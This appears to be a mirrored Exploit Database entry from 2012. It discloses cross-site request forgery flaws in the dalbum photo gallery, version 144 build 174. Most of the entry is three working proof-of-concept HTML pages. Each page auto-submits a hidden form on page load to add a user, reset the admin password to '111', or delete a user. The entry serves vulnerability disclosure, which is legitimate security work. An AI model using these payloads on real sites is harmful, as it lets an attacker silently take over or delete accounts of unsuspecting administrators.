dalbum 144 build 174 – Cross-Site Request Forgery

• Exploit Database
• 134 阅读

• 作者： Ahmed Elhady Mohamed
  日期： 2012-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18685/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80

  dalbum 144 build 174 and earlier CSRF Vulnerabilities =================================================================================== # Exploit Title:dalbum 144_174 and earlier CSRF Vulnerabilities # Vendor: http://www.dalbum.org/ # Download link :http://www.dalbum.org/index.php?go=Downloads # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: 144 build 174 # Category: webapps # Tested on: ubuntu 11.4 # This vulnerability allows a malicious hacker to add a user delete a user and change password of a user =================================================================================== CSRF VUlnerabilities :   POC 1:   <html> <head> <title>Add a user </title> <script> function CSRF() { document.getElementById(&apos;CSRF&apos;).click(); }; </script> </head> <body onLoad="CSRF()"> <form action="http://127.0.0.1/photo/pass.php" method="post" /> <input name="user" value="CSRF" type="hidden" /> <input name="pass" value="123" type="hidden" /> <input name="passc" value="123" type="hidden" /> <input type="hidden" name="action" value="add"> <input type="submit" id="CSRF" name="submit" value="Submit"> </form> </body> </html>   POC 2:   <html> <head> <title>Change user&apos;s password</title> <script> function CSRF() { document.getElementById(&apos;CSRF&apos;).click(); }; </script> </head> <body onLoad="CSRF()"> <form action="http://127.0.0.1/photo/pass.php" method="post" /> <input name="user" value="admin" type="hidden" /> <input name="pass" value="111" type="hidden" /> <input name="passc" value="111" type="hidden" /> <input name="change" value="Change password" type="hidden" /> <input type="hidden" name="action" value="change"> <input type="submit" id="CSRF" name="submit" value="Submit"> </form> </body> </html>   POC 3:   <html> <head> <title>Delete a user</title> <script> function CSRF() { document.getElementById(&apos;CSRF&apos;).click(); }; </script> </head> <body onLoad="CSRF()"> <form action="http://127.0.0.1/photo/pass.php" method="post" /> <input name="user" value="a" type="hidden" /> <input type="hidden" name="delete" value="Delete"> <input type="submit" id="CSRF" name="submit" value="Submit"> </form> </body> </html>